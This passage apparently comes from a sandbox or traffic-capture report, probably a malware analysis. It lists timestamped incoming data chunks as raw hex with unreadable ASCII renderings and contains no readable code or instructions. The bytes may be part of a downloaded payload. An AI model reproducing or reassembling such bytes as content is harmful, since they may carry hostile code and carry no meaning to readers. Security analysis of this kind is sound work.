                                                                                                                                                            2022-09-29 12:45:15 UTC21749INData Raw: a3 14 13 cd a8 b2 e6 4b 9e d2 d5 ee 1a 48 2c 8c 39 a9 8f dc bb f7 c4 5a d3 a5 13 92 ad 74 ca d5 f4 d0 74 59 79 e8 90 34 d1 bf 96 f3 c3 06 0a 32 db a6 08 4d c9 d8 50 00 a0 e5 e1 a1 43 ab c3 83 7a 89 58 b3 9e 0a 2d f0 f2 ea 4b 8d 1f ca 07 14 dc 7f 70 7f 18 53 99 9c 87 0c 7a a8 f2 f6 db 4e ac fd 9f f2 93 35 54 b2 e3 2b 44 9e 65 4a 38 78 df 13 8b 47 67 fd 28 ef d1 43 13 08 ad 5e 9b 39 d1 ba 2f 39 ef f7 05 c3 2a 99 20 bc 7e b8 8d 05 76 f9 a1 8a 9c ef 1f 76 c7 1f 55 26 1e 4e 48 21 45 a6 30 47 45 46 d1 c2 e5 07 d2 f3 e6 c4 3a 54 50 db bf 33 21 90 01 e9 c1 41 1c 92 27 15 7d 02 fc 15 90 4e b9 10 db 5f 78 72 e1 1b 5f 23 d8 31 f2 c0 04 79 fb 47 5b 6d 33 fc 77 6a ed 7e 9f 13 ff 55 64 d2 81 0d 95 16 e8 b8 58 f7 d9 b2 7c 07 79 29 b5 65 88 aa 53 fd 3e 18 60 3a 3f d6 d2
                                                                                                                                                            Data Ascii: KH,9ZttYy42MPCzX-KpSzN5T+DeJ8xGg(C^9/9* ~vvU&NH!E0GEF:TP3!A'}N_xr_#1yG[m3wj~UdX|y)eS>`:?
                                                                                                                                                            2022-09-29 12:45:15 UTC21765INData Raw: 91 62 cf a2 84 fb 27 d0 e1 06 3e d1 f3 ac ec e6 0a a5 3c 22 ab 8f e5 51 7c 79 e3 10 95 ed 79 5b 1f 72 1f 4a 92 20 75 1b 8a c6 fa 02 da 64 d4 dd b8 07 33 bd 95 c0 df f1 0e 53 03 59 01 a1 b5 3a 76 15 a2 29 65 d5 9a 23 5c 0a 68 e9 0e ec 29 af 53 a9 aa 08 51 c6 27 88 0e 92 2a 7d bb 70 d8 b8 10 55 7d 7e 49 42 8b 3a cc 08 83 0a 1f 23 85 1e 80 8c 23 5d f1 6d 5f a6 72 1d f4 9c 1c cc 18 4a e4 0e 17 a4 34 2a ab 3d a6 a5 26 4a 9e 1b 7f 72 f5 40 99 dc 1f 34 94 c5 34 2d 45 a1 dd 43 9e 62 2f 24 d0 59 ce b4 31 de 06 35 e5 09 0a a4 6c 5b 36 9a d1 47 49 56 fc 5c 92 44 4b 38 89 80 14 c1 09 49 91 dd 7c fa b2 ec c8 be b5 41 20 dd 5a ab f9 9f f8 fd d0 1a c2 dd 20 44 b2 c2 36 30 85 74 49 1a af 03 3d ab 62 c8 a9 a6 ff a2 80 d9 c4 7d 65 ee 77 db 2f 38 7a 6d 70 e2 0e 35 7a 28 54
                                                                                                                                                            Data Ascii: b'><"Q|yy[rJ ud3SY:v)e#\h)SQ'*}pU}~IB:##]m_rJ4*=&Jr@44-ECb/$Y15l[6GIV\DK8I|A Z D60tI=b}ew/8zmp5z(T
                                                                                                                                                            2022-09-29 12:45:15 UTC21781INData Raw: f7 96 f3 07 ad b8 fb 89 d3 21 29 23 1f f5 0a 22 b1 2a 97 6a e1 2e db f6 6f f5 78 1d d1 98 e7 28 94 8b ec ad 92 6c cd d7 ee 21 1c f0 f5 bb 4d a8 02 b8 3b 2e 44 dd e0 26 d5 d6 b9 c2 5a 0f 14 b4 55 0c 31 65 9d 95 7d 79 49 c6 79 4e 11 16 58 0d 64 bd ba 27 9b 0e 80 c0 ca ce 2f 62 3f d9 cb f5 cd ca 82 5a 54 c7 48 8d c0 89 ff af 76 8a 47 26 e6 61 be 4a 29 4b e4 5b 53 59 ff 09 02 07 2a e3 d5 5a 54 f8 4a e1 a2 0a f5 97 f9 dc ef 78 48 c9 18 a0 f2 15 53 7f 7f 30 3d 3f 49 9d 7a 75 92 98 f4 ad 62 f9 0d 4a bd 4d aa 04 b7 a9 6f 09 4d 4f db 95 39 e8 de 6c 74 13 a2 fd 64 d0 21 f6 e6 38 c9 d3 93 7d 2c 76 de dd 60 19 b4 82 e2 d8 df 74 7f c0 18 66 16 fa 75 6e ca 78 b4 c0 97 99 38 aa 04 76 2a f3 f5 2c 34 43 27 69 43 eb 93 a6 d8 76 08 8f 2d e2 76 1a 53 04 ef 96 91 08 14 30 ff
                                                                                                                                                            Data Ascii: !)#"*j.ox(l!M;.D&ZU1e}yIyNXd'/b?ZTHvG&aJ)K[SY*ZTJxHS0=?IzubJMoMO9ltd!8},v`tfunx8v*,4C'iCv-vS0
                                                                                                                                                            2022-09-29 12:45:15 UTC21797INData Raw: 89 f2 3e be 96 56 95 cc 3d b5 91 c7 d3 55 ca e4 67 76 41 36 fc 34 b2 14 e1 42 ce 9b d0 fe 12 46 f1 2f 1c 58 d5 99 8c e0 0d 99 34 f6 79 20 2f be 67 30 fa 40 0a 1a 5a c5 9b ef f1 fb a8 c9 27 bd 9f a6 a7 fc 00 4c 5f cd 2e eb db 37 6d e5 fe 97 b3 21 b9 78 64 12 4b 85 de 1c f9 7f f6 79 72 8a fb d4 17 c0 eb 53 80 42 71 bb 8f e5 42 49 f1 e6 d3 b6 32 45 1e ee 21 aa c3 8c 0f af 74 ae 06 08 f5 dc ac 94 7e 0c 91 46 a4 75 26 71 12 79 0f 95 60 68 e8 11 f0 be 15 16 d8 48 dd b1 9d 7a b9 f3 dc fa b2 84 ed a9 f8 d7 f0 6d 85 a9 4a d9 de f4 b3 7d 09 c4 bf cd fe 19 07 82 be d3 7c aa 34 b0 ac 1e 48 c8 06 6f e5 57 50 b5 81 49 32 86 b4 81 c5 e9 df c2 a1 33 27 0d 4d e5 35 07 6c 69 c9 37 6c c4 7e bf b0 e6 f9 59 58 f9 cd f3 fb 94 42 cf cc b8 9b ee 1b d8 75 6b 44 46 3f f6 28 12 61
                                                                                                                                                            Data Ascii: >V=UgvA64BF/X4y /g0@Z'L_.7m!xdKyrSBqBI2E!t~Fu&qy`hHzmJ}|4HoWPI23'M5li7l~YXBukDF?(a
                                                                                                                                                            2022-09-29 12:45:15 UTC21813INData Raw: 22 51 db 01 46 11 aa 61 25 60 b9 f0 be 96 a1 eb 7a 48 89 e3 de 3b 56 9e 90 89 53 39 33 88 88 ca 8b 24 ba 80 13 c0 fa 70 ff 14 db da b0 61 35 9b 6c d5 2a 73 f8 b8 4f 53 25 52 7a f6 72 d0 3e bb ef ad d4 17 c1 5d 5a 1e fd 50 79 77 5e 37 41 0a 57 4a 5a 15 23 3d 5d f9 b3 79 6b d3 1e 21 1e 31 25 a4 ca a7 3f 01 ea bf 8c f6 fa 70 83 9f 33 d2 00 63 2a 25 36 ea 9d a3 8a c5 2b ac 34 4b 59 dd 3a 63 51 39 8f d1 6a 9a 1f 9a 9b 55 78 49 18 d1 02 ba 5c 20 f4 90 ef 30 e4 d2 78 52 87 3e b7 73 b4 3d 96 12 5c ee 42 7e 60 0d 36 1d 03 e2 46 35 74 09 30 06 62 d5 82 4c 2a 08 5a 19 b9 fe 14 ef 67 e6 cb 83 58 30 42 ac be b4 4c 9d e3 2b 12 3c 3a 1e 6c 19 3a 83 91 e3 e6 21 fb d0 f7 5f 7b 06 e1 e2 65 9f 07 09 fb ea ab 2b 9b 03 34 7d 23 d1 d9 25 ca 2b 75 4c 6e 92 cc a0 1f df e5 d7 f2
                                                                                                                                                            Data Ascii: "QFa%`zH;VS93$pa5l*sOS%Rzr>]ZPyw^7AWJZ#=]yk!1%?p3c*%6+4KY:cQ9jUxI\ 0xR>s=\B~`6F5t0bL*ZgX0BL+<:l:!_{e+4}#%+uLn
                                                                                                                                                            2022-09-29 12:45:15 UTC21829INData Raw: 08 51 2c 7d 23 b9 8b 49 76 76 ba 00 7f 74 8d 02 c7 07 2d d2 32 51 b8 99 3c a9 18 c9 2e ae 3f 5f ef c7 a9 44 4b 99 2e b9 7a c8 55 43 40 3e e8 42 7f 9b e3 63 b0 c0 7d 40 3c 5c 69 f3 79 3d c1 3d 6f 21 29 d7 ae ee cb 94 82 b8 b6 5d 18 da b8 31 81 0f 00 83 a2 3f c2 3b b1 6f 88 0f c6 67 f0 32 f1 0c a7 a1 9e 75 38 73 b2 f8 d9 33 a3 ca 87 3c f3 a6 31 94 5d 83 4f 93 ea 09 15 66 2d fe 77 ae de fd 4a dd 41 e0 da 91 da 05 82 83 d2 bd b2 1a 29 f1 31 65 3c b3 70 8f 94 b8 65 76 06 5b d6 33 66 9a cd 95 10 47 22 58 09 36 61 bc d7 ca dc 62 03 2f 60 41 1c 0e 73 18 a2 3f 8a 53 c5 4e c2 68 a5 bd 93 d8 89 40 93 3e d9 b5 26 37 23 6b f0 2d 41 41 65 a7 cc 26 f1 a8 bf 87 df 1c f2 0e 38 c9 97 b6 76 94 00 09 a7 2f 35 8d 99 2c 67 e4 8b 93 32 2d 0b 31 22 4b e3 80 b7 3d 8d c6 57 3d 0f
                                                                                                                                                            Data Ascii: Q,}#Ivvt-2Q<.?_DK.zUC@>Bc}@<\iy==o!)]1?;og2u8s3<1]Of-wJA)1e<pev[3fG"X6ab/`As?SNh@>&7#k-AAe&8v/5,g2-1"K=W=
                                                                                                                                                            2022-09-29 12:45:15 UTC21845INData Raw: 81 d1 31 ed dd 74 cb 1f 14 2a 55 dc e8 12 5b 6f 83 7c ec c8 d4 39 a6 78 ec 3a 87 b8 6a 93 e1 f0 f4 ea da e7 b8 d0 16 45 28 05 d8 93 18 5e d9 e3 f5 92 29 d9 29 81 08 ff e9 38 46 bc d9 72 e3 12 88 c1 d4 1b 5e 79 9b f2 41 dd 84 8c 3b 72 d3 7f a0 1e f9 77 5f 01 2c ac 9f c8 98 91 1e 3d 85 06 dd 3c 9a d0 9f 29 5b d2 a6 8d 8c 4d da 05 65 a2 88 06 89 b3 4f e2 d7 39 ce e3 59 d1 36 2c df cb c5 ee 7d 46 e0 96 91 37 56 27 a3 85 70 fa 1f 2d a1 b9 76 89 42 e9 3e 49 85 61 5a 0d 16 d0 2c 14 8a e5 59 33 c1 2a 79 52 c8 33 94 54 6a 80 99 71 9e 18 21 78 82 bb ea b8 df c1 23 bd 4e 79 fe f0 0b cf 16 00 5c 9a 19 76 ea 8e e5 ba 6d d1 e1 59 a1 5c 94 8e df 15 6e c9 27 88 0a 1f 69 78 e9 56 29 db cc 8b de ee 28 4e e0 a4 90 56 1e 7c 3f 38 e0 a6 37 e0 29 9e a5 c8 75 cf 13 7f 6e 9a 35
                                                                                                                                                            Data Ascii: 1t*U[o|9x:jE(^))8Fr^yA;rw_,=<)[MeO9Y6,}F7V'p-vB>IaZ,Y3*yR3Tjq!x#Ny\vmY\n'ixV)(NV|?87)un5
                                                                                                                                                            2022-09-29 12:45:15 UTC21861INData Raw: 85 77 49 c7 2e 6e 84 3c db 78 f2 17 49 d2 13 0f 6b 4f b4 ac 00 3a 8e 57 0d f0 69 2d 92 0f 3e fc b6 dd 14 7b cd 71 81 c6 31 e3 0d 80 e5 13 7a a0 3f 56 7c d6 d6 c8 d4 e2 a6 fe 76 95 a3 17 16 98 b0 00 89 58 48 22 e2 7d 98 6a 0b d6 22 2d 56 c9 d0 f7 6a 47 38 01 4f 59 ef b4 c7 d6 8a 26 aa 7b d6 6d bc d4 d7 10 38 6a cb 60 ca 05 cc 76 09 49 f8 cc 38 f9 7d 76 af 78 6d 59 73 2d 40 be 93 80 c6 42 06 16 7b 27 e1 57 aa ca 4d 3e 6f bf c0 11 f3 9e a8 5b 72 6a 5c 10 47 42 46 e9 ef c2 12 21 88 99 ef 68 30 53 68 5f 33 57 48 6c 09 91 a6 16 5b 74 85 91 b3 9f 92 e7 0c 04 db 9d 9e 12 c2 ef db 68 de 87 d4 2c 46 c8 f4 35 a5 8d 9c 7c c8 1e a0 18 ff 9a de 27 cc b8 e4 3b 41 e9 ff da c4 30 6d a7 67 a0 5b 8c 69 b5 ef 47 19 63 0b 7b 66 a2 34 a4 3f 8c 5a b6 45 c7 a2 b6 a7 2c ae fa bb
                                                                                                                                                            Data Ascii: wI.n<xIkO:Wi->{q1z?V|vXH"}j"-VjG8OY&{m8j`vI8}vxmYs-@B{'WM>o[rj\GBF!h0Sh_3WHl[th,F5|';A0mg[iGc{f4?ZE,
                                                                                                                                                            2022-09-29 12:45:15 UTC21877INData Raw: 5e 6c b5 44 d3 4f 5b 91 ab 94 f1 53 aa 12 1c b8 f5 0c 55 bd c1 23 b9 6e 70 77 da 0e 6c a1 72 d9 0b 51 96 cc b5 c2 ea 17 62 97 4c 82 14 a8 d4 9d ae 5c 31 c7 5f 01 96 76 e8 5b 2c 06 6a d9 44 6e 24 8f 7a 96 c4 62 4f 67 12 d7 12 a3 e0 82 6c c3 b8 7e 59 79 b2 00 ab 51 dd 97 01 18 d1 51 85 4d 91 b1 9e c5 99 cf a4 c6 c7 a9 0b d1 3d e5 06 58 bc 2d 4a 45 84 5a 90 ef ce 27 54 de d7 b4 8d 95 bd 66 b9 58 3e 77 4f c9 5b 57 b1 3b 8c 52 47 27 9c e7 da fa 3f 58 34 69 8b 1b 52 67 8c cd 8d 5d 71 ff 73 31 6c 72 2c 29 50 88 75 de 11 8e 71 a5 f7 e6 f7 10 5b e9 95 c0 34 6a 24 46 62 fa 77 26 f3 75 78 a5 b6 e7 fe ab 12 55 f6 4a 2f 00 98 b5 3f 56 58 1a ed 38 47 fd ab 23 a3 ba 5d ee b4 6f 5a 14 da 76 73 de ee 40 c0 64 ea 3d 2e 91 33 6e 6c 87 75 22 c6 b4 82 30 55 55 a9 88 b0 09 db
                                                                                                                                                            Data Ascii: ^lDO[SU#npwlrQbL\1_v[,jDn$zbOgl~YyQQM=X-JEZ'TfX>wO[W;RG'?X4iRg]qs1lr,)Puq[4j$Fbw&uxUJ/?VX8G#]oZvs@d=.3nlu"0UU
                                                                                                                                                            2022-09-29 12:45:15 UTC21893INData Raw: b7 65 16 c8 f6 d3 83 6e e5 e8 88 ce d3 7c d0 19 8f e6 bc 88 26 69 92 fb 16 d2 fe 5d 55 83 eb 02 60 11 0e 45 51 04 b3 fd 4c 12 65 87 3d 0f a0 3b 36 58 29 0f f1 fc 69 ec 69 ac 89 76 0e 41 f1 07 27 20 24 e6 08 d8 c8 6f bd 7a 22 a5 36 c1 39 a3 c5 86 9a b5 f8 51 81 db b1 c2 44 d7 19 ff 2b 20 44 80 9a e1 04 81 c1 38 75 1e 5a 6f 2a 4b aa 3b 2e 88 1b be 40 f1 19 f2 d4 53 94 89 0d 09 bb 49 62 bd f9 27 f2 ee 15 43 e0 4d 92 b4 71 33 b4 cf 87 62 db 6e 3e 9b 80 8a f0 66 33 e7 19 13 6c 3d ca c2 7d 64 f8 74 c8 73 ca b6 2f e9 13 60 13 86 4e 1e 4f 97 9f e0 80 0d 36 ca fc 67 15 2d 57 6f ad f2 f2 56 2c 67 47 36 4d ff 5a 63 0f b9 7a e9 37 1f 4b 08 1a 9e d2 0f 66 d7 71 2e 46 bb 66 40 06 03 42 c8 4d 15 31 64 b0 1b f8 5d dc 98 47 a5 c3 5a 1e 6c 62 13 e2 69 08 ac 41 dd b4 49 70
                                                                                                                                                            Data Ascii: en|&i]U`EQLe=;6X)iivA' $oz"69QD+ D8uZo*K;.@SIb'CMq3bn>f3l=}dts/`NO6g-WoV,gG6MZcz7Kfq.Ff@BM1d]GZlbiAIp
                                                                                                                                                            2022-09-29 12:45:15 UTC21909INData Raw: 94 8d 97 c9 b5 92 b4 cf 46 d9 1d f6 a5 01 95 db 6a 2a b9 83 6b da 9e ec 7c 03 42 5c a6 0c b7 5f 49 eb 51 49 60 99 41 88 91 16 d9 68 d1 17 57 14 e1 20 ad 00 3e dd 11 76 5f 0f 4d ce 06 17 b8 b5 86 6b ce ec 69 c6 cf c3 9f 0a bf f0 33 63 29 be fd 1d 8c 28 21 18 9c c0 26 d3 c8 6d c5 c5 d4 64 d3 24 9b 8f 95 33 fb 84 15 26 23 2a 23 00 3f 34 49 55 24 62 18 1a 5d f1 b4 46 11 d4 c7 25 e2 32 7a 61 42 b9 e8 e0 cc b7 be 3d 96 11 b2 a0 1a 4b 30 d7 de 9e ab d6 e0 f7 47 9d 69 e0 fd 0e 8e f0 57 b3 b3 17 9f 32 c2 ba 62 b5 84 e6 dc 81 7f bb 27 61 d5 41 cd ca 21 00 bf 06 7e f2 4c 8e ee 3b 62 8f 87 b2 59 94 6f 22 5b 42 64 13 88 df 17 cf c3 0c be 0b 81 b9 0a 78 83 91 ae d9 b2 15 69 bf bc e7 37 06 72 0b bf 89 20 15 10 e1 36 ca 40 79 ce de fb e3 37 fe 02 d2 d9 fd 0b d4 3f c0 82
                                                                                                                                                            Data Ascii: Fj*k|B\_IQI`AhW >v_Mki3c)(!&md$3&#*#?4IU$b]F%2zaB=K0GiW2b'aA!~L;bYo"[Bdxi7r 6@y7?
                                                                                                                                                            2022-09-29 12:45:15 UTC21925INData Raw: 61 37 a3 da 17 d7 74 f0 fd 07 d8 1b 14 71 d6 cb 49 8a e3 6b a6 7b 05 24 2a 8a 55 77 7c 20 f9 bb ff b3 0b 92 62 d6 1b 52 19 32 a4 81 e8 69 d0 03 cc 6a 9b e2 c4 58 4e a7 62 05 7d e4 62 ac 39 a8 84 b6 6e 93 ce f4 89 9d bf b7 09 1b b7 69 84 ad 71 15 3c 72 21 2a b1 8c d5 43 cd e8 e4 c6 fd 35 f6 86 8c d3 68 e8 b4 18 65 13 72 b4 9b 18 a6 fa 1c b8 41 43 09 94 2d 68 5f 87 97 40 74 67 b6 ea 43 e7 27 88 43 57 a2 5b 1c 65 9a 17 ec 5b f8 ee 9a 74 70 68 eb 14 17 03 1d 0d ae 8e e0 19 47 d3 65 22 62 20 b1 6e cb 0d d7 92 78 31 f4 b6 b0 a3 5a 70 2d a2 96 1d d1 67 3d a0 0c e9 26 15 da d7 dc 6c dc 23 5d 6c 94 2a af 56 df 38 2d 31 a6 e6 5d 32 43 58 0b 25 24 4d fc 17 99 49 62 f4 93 af cc 40 e6 8c 33 c4 b9 63 8d 3f 76 85 44 6d 03 38 1c c8 45 77 33 2f 04 48 7e 48 5b b3 f3 9f a3
                                                                                                                                                            Data Ascii: a7tqIk{$*Uw| bR2ijXNb}b9niq<r!*C5herAC-h_@tgC'CW[e[tphGe"b nx1Zp-g=&l#]l*V8-1]2CX%$MIb@3c?vDm8Ew3/H~H[
                                                                                                                                                            2022-09-29 12:45:15 UTC21941INData Raw: e6 45 71 63 39 8e 45 e3 3f af 21 81 83 bf 41 4f b3 de b8 07 57 4b 5c 12 57 60 3e 43 cb 6c 1d 56 db 23 91 aa 47 99 c9 7f d6 6f 9f c9 f0 fe ac 7c 65 ef 47 54 06 7b d0 71 15 77 0b ec 2d fa c2 12 ae 46 17 72 ea a2 5d 17 fd 5d 86 88 5e 47 04 1c 9b 39 bc 85 70 98 b5 3e f5 77 0d b0 10 74 14 d2 e5 44 33 37 19 dd 3b a8 5d eb 2a 05 2d a9 e0 96 f2 12 a6 62 b0 c9 23 36 55 51 55 e6 44 bc ab 90 44 d1 14 55 a7 eb 1c 6a 0e 6d 47 9c 4e 72 e1 1a d4 75 e2 50 f4 03 5d 01 8c 6a bd 19 2a ea b9 fc f3 6f a7 9b 4e 16 f5 9a e8 99 a2 dd 71 db 67 dd c1 0f 73 3c 60 e8 6c 37 aa ce 2e 03 51 91 98 7f 7a a0 d0 e1 84 71 40 b2 42 8f af da de 62 de 54 80 f0 47 d4 2a b3 6a 70 d8 6f 8b 51 d7 9c 6a df a0 a2 3d ed 2a 4e a6 77 9d b5 b5 15 24 14 06 a5 b0 9f cd 9f 52 ee 8b ec af 61 50 d9 fc d9 ac
                                                                                                                                                            Data Ascii: Eqc9E?!AOWK\W`>ClV#Go|eGT{qw-Fr]]^G9p>wtD37;]*-b#6UQUDDUjmGNruP]j*oNqgs<`l7.Qzq@BbTG*jpoQj=*Nw$RaP
                                                                                                                                                            2022-09-29 12:45:15 UTC21957INData Raw: c9 41 1b 7f 32 fd 0a 03 fc 06 37 a3 63 71 10 18 73 cb a0 9f cb ce 95 ae 0f 17 7c 0f 32 fa 0b 4f aa 44 82 30 89 09 dc ca b3 3a af 30 c6 ab 8b 1d bb 11 4b a5 ed fa f0 d6 2c d6 a9 7f 9a 45 5b 39 19 d5 8f 9c 11 e6 4f 25 36 9c 1d 44 75 2c c8 79 75 df 02 91 81 d0 cf d2 cf 8b 68 98 62 df e2 06 40 f5 13 78 a6 4b c0 c6 02 ce 98 b9 d7 9d 76 4d 42 9d 27 bf fd b2 ed 77 f4 19 21 2f 31 76 51 1f c6 c7 5e 6b 67 36 87 b5 00 c5 8b 16 ec e8 f6 65 72 fb c1 f1 6c 42 4b 63 06 08 fd 43 4a 45 9e 8f 31 03 4c 03 02 4b 51 5f a3 c7 71 72 f7 8f 6f 33 ad 18 84 85 82 22 b0 4f 4c 13 2c 71 71 1c c6 27 14 23 8d c2 34 92 72 74 46 40 02 91 15 33 29 5b 2d a9 06 23 35 ba 35 81 2e 3a 7c ce 28 eb 3f 57 de b9 42 83 0d e7 98 d2 1d 5e 77 53 b5 5a 96 64 84 0c b1 73 15 af d1 5a eb 41 8b 96 d8 e4 2d
                                                                                                                                                            Data Ascii: A27cqs|2OD0:0K,E[9O%6Du,yuhb@xKvMB'w!/1vQ^kg6erlBKcCJE1LKQ_qro3"OL,qq'#4rtF@3)[-#55.:|(?WB^wSZdsZA-
                                                                                                                                                            2022-09-29 12:45:15 UTC21973INData Raw: 7b 67 14 f7 0f d2 40 9e 6c ae 78 6e af b6 da 8f 99 fd 50 f6 ef e5 7a f2 87 e2 d6 00 51 3f 83 3d d3 17 45 b5 8a df 0c 91 a7 e0 d7 4b b2 33 f1 19 11 ba 6a 25 56 10 bb d7 7d c9 ff 3b 45 ba a9 1d 5f 04 70 2a f4 7c 23 6a 8e 8e 4c 60 61 0f 52 d9 95 20 09 64 b2 56 d7 b2 d4 89 91 bb c3 bc 66 c2 fb 49 9c cf 04 ee f3 3d 5a 56 60 65 a0 bb 5f b2 7a d6 b5 3c 03 f1 65 b4 40 78 b9 df 7a 23 af 39 69 09 2e 58 85 70 c6 31 dc c5 00 86 b5 18 3a d9 11 74 7a f2 3b 79 87 fd ff fa 80 d7 19 db d9 5c b9 52 81 a9 76 88 a5 a2 92 55 87 7f 78 56 92 55 25 02 b4 b6 32 c9 8b cc 43 8d 42 81 1c b6 f4 a8 65 f0 e2 02 f8 8d 9b 11 52 18 b8 b8 8d 98 c3 3e 45 8a 2a 23 6b bc 46 6a 49 c1 98 c2 cd 52 6d 3d 13 26 b5 d1 3e 1e d5 4a 00 d8 8b ca 58 93 5c 31 42 55 4f d7 57 f0 08 5d 90 9b 08 4c a7 83 b8
                                                                                                                                                            Data Ascii: {g@lxnPzQ?=EK3j%V};E_p*|#jL`aR dVfI=ZV`e_z<e@xz#9i.Xp1:tz;y\RvUxVU%2CBeR>E*#kFjIRm=&>JX\1BUOW]L
                                                                                                                                                            2022-09-29 12:45:15 UTC21989INData Raw: c8 a4 59 d5 1d e6 9d 4d 82 90 21 53 fc 1c 8e 44 7c 74 b6 9a 5e 4f 2f e8 44 22 e8 a1 b1 35 ad 10 0c 82 55 60 a6 e6 04 3b 59 c6 d0 96 d6 0c c5 65 8d 70 0e 9e 88 99 ea cb db ab b8 18 cd c8 aa f3 82 4b 38 2a 29 3e df 91 77 b3 70 9a b0 b0 13 4d 61 9d 9d 5c b6 81 24 d1 bb 9a 28 ea f0 94 01 a7 ba e9 bf 9c 43 d5 a5 6c 05 fb 17 35 59 d5 90 86 8e 2b aa 01 0a 49 41 b2 22 2b da 86 8a cc 93 93 cf 10 c3 eb 0b 25 e8 1a d4 c9 9d 0f 4e 79 5f ee d2 75 3c e0 03 54 d5 54 83 3a c7 ef 49 fe f2 fa e0 9a cc 7a 02 e2 6f 5b 25 01 6d 35 df 8e 93 67 9f 94 d0 d6 6b 11 77 4a e2 1c ef d3 a3 c8 ef 35 d4 15 48 2d 4c b2 c1 7a 6c 46 4a de 59 32 55 cb 59 97 4a 26 7e 98 ac 63 8f 49 ba 1d 1c 55 19 c3 c5 cc a6 88 80 05 b0 d5 22 5c f4 58 61 fe 11 1a f7 ec 65 b5 0d 5a e9 51 2a 9c 50 5b 3d b4 55
                                                                                                                                                            Data Ascii: YM!SD|t^O/D"5U`;YepK8*)>wpMa\$(Cl5Y+IA"+%Ny_u<TT:Izo[%m5gkwJ5H-LzlFJY2UYJ&~cIU"\XaeZQ*P[=U
                                                                                                                                                            2022-09-29 12:45:15 UTC22005INData Raw: 98 84 07 ce b5 06 29 fd 36 ae 25 06 32 7e 63 d5 e1 eb 28 f0 a8 0c a4 c9 67 3d 11 0a 82 d7 da f9 bf d3 29 1e d2 fe 36 e5 30 90 b4 52 f4 de a0 01 ba fd 15 36 3e e9 f1 22 a5 80 be 24 03 dd 77 d9 f8 31 b3 17 b5 e6 fe 8c 4a 2f 13 a6 7a be 5c e5 ca 3e f7 5f a5 b5 a2 00 1e 52 e1 05 6b 6d 99 6d a7 64 38 41 fe a2 35 df c8 6a 03 a3 6a d6 52 a3 98 4a 50 05 f8 67 c5 e1 b8 9c 24 43 22 08 7c 0c 22 6e c8 5b 49 e9 3c cc c7 15 f3 b1 73 36 b7 0d f5 86 e5 9c a8 6c 61 9f e3 f6 66 2e 14 35 48 d8 59 55 87 ea 48 7a 7f 71 69 33 6a 43 27 59 42 0f 19 41 50 8e 6c 6f 8e 6c 40 5b 05 66 d2 a8 32 d2 50 1d 51 2b 55 d8 80 80 6c 58 43 52 c1 a1 d4 aa 36 c2 db 40 ea a7 c4 73 40 8e b3 6b e4 06 d1 d5 f9 ac 5a ec c3 0c dc 76 aa 04 6b 0f 28 57 2c 5b 2c 48 05 3e 98 12 c0 f8 1b a2 9a b7 4f 42 9c
                                                                                                                                                            Data Ascii: )6%2~c(g=)60R6>"$w1J/z\>_Rkmmd8A5jjRJPg$C"|"n[I<s6laf.5HYUHzqi3jC'YBAPlol@[f2PQ+UlXCR6@s@kZvk(W,[,H>OB
                                                                                                                                                            2022-09-29 12:45:15 UTC22021INData Raw: 18 65 2d 18 84 7b 4a 2e 32 92 75 54 ba f9 ce fa 4d b8 13 04 57 aa 99 60 93 5a ce e3 c6 47 62 88 1e 3d f1 c9 bb 4c 99 f5 78 52 87 bb 71 62 3c 56 9e 82 64 f2 60 48 0f 7d c6 b6 da b5 90 71 03 72 1f db fa 60 24 f6 61 2f 45 a1 49 54 72 b8 e3 3e ed 00 a9 8a 10 2c d8 55 90 b6 b6 b4 59 39 56 4b b4 18 ae db 2d 34 5a d0 44 d2 c8 c9 5f 47 fb 88 5f 2a 53 24 1f 64 51 ac 1d 7f c7 1c dd e4 d0 0b 1e de 27 0e 66 63 27 c3 9f 33 2f 1a 01 ba 7d 68 96 f5 dc be e0 08 30 f2 92 c3 02 5e cc 13 0f a9 27 42 ff fa f3 c0 e0 83 85 99 96 b6 79 1b 40 2d 92 25 e5 c5 4f 17 aa ab ce 3a 08 3d a7 4e dc d6 f7 4b f2 76 08 7b 39 cb b7 27 db e1 45 9a ab f4 ae 2e 52 75 f4 82 6e 43 d0 76 11 e1 76 da 53 45 d3 3d f5 b5 8c 28 ee 31 aa d1 97 a5 8b 7c 75 a0 fd 53 45 fa a6 27 99 23 43 7b 37 d8 88 8d ea
                                                                                                                                                            Data Ascii: e-{J.2uTMW`ZGb=LxRqb<Vd`H}qr`$a/EITr>,UY9VK-4ZD_G_*S$dQ'fc'3/}h0^'By@-%O:=NKv{9'E.RunCvvSE=(1|uSE'#C{7
                                                                                                                                                            2022-09-29 12:45:15 UTC22037INData Raw: db 21 4c 6d 52 a2 d1 96 8e 8a 33 a3 44 92 01 b3 88 c9 70 1f ea 7f 0a 05 4e 1c a7 50 01 83 ae a4 cf 75 0c b1 9f 18 05 49 e1 52 77 37 7b ef ae 14 92 d4 49 23 cd 08 71 1f 56 84 ae c2 43 86 e5 52 3b 1b 78 d1 43 cb 68 fa 17 40 a5 04 82 8a f8 4c 51 70 49 24 8d c9 75 97 84 e2 ea 5a 26 30 be 13 70 10 d6 cb f9 c0 f3 40 09 c8 dc 76 8f 1b 40 a4 47 ac f8 a1 d0 0f 1c fa 83 fe 8b 54 2e d0 66 e9 78 d2 ee 18 45 54 78 fc 4f df 43 c0 3e fe 39 f3 ae 1f 99 e5 81 5e 14 2b 47 35 5f 3a 61 db a9 60 c9 06 79 fc b4 f5 0e f9 40 ad 05 6b 95 c8 2c 35 e7 88 90 fb d4 6c f3 72 1b 53 5f af a3 b2 ee 66 f5 d4 96 c5 d1 a5 81 4e 8a 27 8b a9 92 2a 9e f3 60 0b b7 fb 08 3c b3 78 f2 a7 2d 97 51 79 aa d3 ce fa ee 6a 57 4d a8 c3 8b f8 0c 2a af 46 59 b2 ef 81 00 5a 3a 12 63 cb 02 aa 17 24 78 ce 14
                                                                                                                                                            Data Ascii: !LmR3DpNPuIRw7{I#qVCR;xCh@LQpI$uZ&0p@v@GT.fxETxOC>9^+G5_:a`y@k,5lrS_fN'*`<x-QyjWM*FYZ:c$x
